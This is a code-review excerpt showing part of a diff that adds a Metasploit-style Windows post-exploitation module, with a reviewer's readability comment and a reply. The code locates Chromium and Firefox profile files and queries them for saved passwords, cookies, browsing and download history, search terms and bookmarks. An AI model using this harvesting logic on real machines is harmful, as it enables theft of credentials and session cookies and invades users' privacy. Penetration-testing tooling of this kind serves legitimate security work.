modules/post/windows/gather/enum_browsers.rb

```diff
@@ -0,0 +1,503 @@
+    if file?(keyword_search_history_path)
+      extract_sql_data(keyword_search_history_path, 'SELECT term FROM keyword_search_terms', 'Keyword Search History', browser)
+    elsif datastore['VERBOSE']
+      print_error("Keyword Search History not found at #{keyword_search_history_path}")
+    end
+
+    browsing_history_path = "#{profile_path}\\History"
+    if file?(browsing_history_path)
+      extract_sql_data(browsing_history_path, 'SELECT url, title, visit_count, last_visit_time FROM urls', 'Browsing History', browser)
+    elsif datastore['VERBOSE']
+      print_error("Browsing History not found at #{browsing_history_path}")
+    end
+
+    bookmarks_path = "#{profile_path}\\Bookmarks"
+    extract_json_bookmarks(bookmarks_path, 'Bookmarks', browser) if file?(bookmarks_path)
+  end
+
+  def extract_gecko_data(profile_path, browser)
+    logins_path = "#{profile_path}\\logins.json"
+    if file?(logins_path)
+      extract_json_data(logins_path, 'Passwords', browser)
+    elsif datastore['VERBOSE']
+      print_error("Passwords not found at #{logins_path}")
+    end
+
+    cookies_path = "#{profile_path}\\cookies.sqlite"
+    if file?(cookies_path)
+      extract_sql_data(cookies_path, 'SELECT host, name, path, value, expiry FROM moz_cookies', 'Cookies', browser)
+    elsif datastore['VERBOSE']
+      print_error("Cookies not found at #{cookies_path}")
+    end
+
+    download_history_path = "#{profile_path}\\places.sqlite"
+    if file?(download_history_path)
+      extract_sql_data(download_history_path, 'SELECT place_id, GROUP_CONCAT(content), url, dateAdded FROM (SELECT * FROM moz_annos INNER JOIN moz_places ON moz_annos.place_id=moz_places.id) t GROUP BY place_id', 'Download History', browser)
+    elsif datastore['VERBOSE']
+      print_error("Download History not found at #{download_history_path}")
+    end
+
+    keyword_search_history_path = "#{profile_path}\\formhistory.sqlite"
+    if file?(keyword_search_history_path)
+      extract_sql_data(keyword_search_history_path, 'SELECT value FROM moz_formhistory', 'Keyword Search History', browser)
+    elsif datastore['VERBOSE']
+      print_error("Keyword Search History not found at #{keyword_search_history_path}")
+    end
+
+    browsing_history_path = "#{profile_path}\\places.sqlite"
+    if file?(browsing_history_path)
+      extract_sql_data(browsing_history_path, 'SELECT url, title, visit_count, last_visit_date FROM moz_places', 'Browsing History', browser)
+    elsif datastore['VERBOSE']
+      print_error("Browsing History not found at #{browsing_history_path}")
+    end
+
+    bookmarks_path = "#{profile_path}\\places.sqlite"
+    if file?(bookmarks_path)
+      extract_sql_data(bookmarks_path, 'SELECT moz_bookmarks.title AS title, moz_places.url AS url FROM moz_bookmarks JOIN moz_places ON moz_bookmarks.fk = moz_places.id', 'Bookmarks', browser)
+    elsif datastore['VERBOSE']
+      print_error("Bookmarks not found at #{bookmarks_path}")
+    end
+  end
```

Comment:
Could we possibly break this down into smaller methods to potentially improve readability.

Reply:
Done. Hope this is better now.